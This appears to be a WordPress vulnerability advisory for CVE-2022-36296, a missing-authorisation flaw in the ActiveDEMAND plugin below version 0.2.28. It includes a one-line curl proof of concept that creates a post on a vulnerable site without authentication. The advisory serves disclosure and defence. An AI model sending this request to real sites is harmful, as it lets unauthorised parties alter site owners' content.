ActiveDEMAND plugin < 0.2.28 – Unauthenticated Post Creation/Update/Deletion | CVE 2022-36296 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation in some of its REST route, which could allow unauthenticated users to delete, create and update arbitrary post

Proof of Concept

The following curl request will create a post draft whose title is 'hacked-title':

curl -X POST --url 'http://vulnerable-site.tld/wp-json/activedemand/v1/create-post?api_key=&slug=hacked-slug&title=hacked-title&content=hacked-content'

Affects Plugins

Fixed in 0.2.28

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Tien Nguyen Anh

Verified

Yes

WPVDB ID

d06a2db3-557b-4eae-ad80-85701cd40f3a

Timeline

Publicly Published

2022-08-06 (about 3 years ago)

Added

2022-08-06 (about 3 years ago)

Last Updated

2023-04-12 (about 3 years ago)

Other

Published

Title

Published

2025-07-16

Title

News Kit Elementor Addons < 1.3.5 - Missing Authorization

Published

2023-04-19

Title

Ebook Store < 5.78 - Unauthenticated Sensitive Data Disclose

Published

2025-04-04

Title

Lafka Plugin <= 7.1.0 - Missing Authorization to Authenticated (Subscriber+) Theme Option Update

Published

2024-07-19

Title

Getwid – Gutenberg Blocks < 2.0.11 - Missing Authorization to Google API key update

Published

2025-01-24

Title

Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress < 1.3.5 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update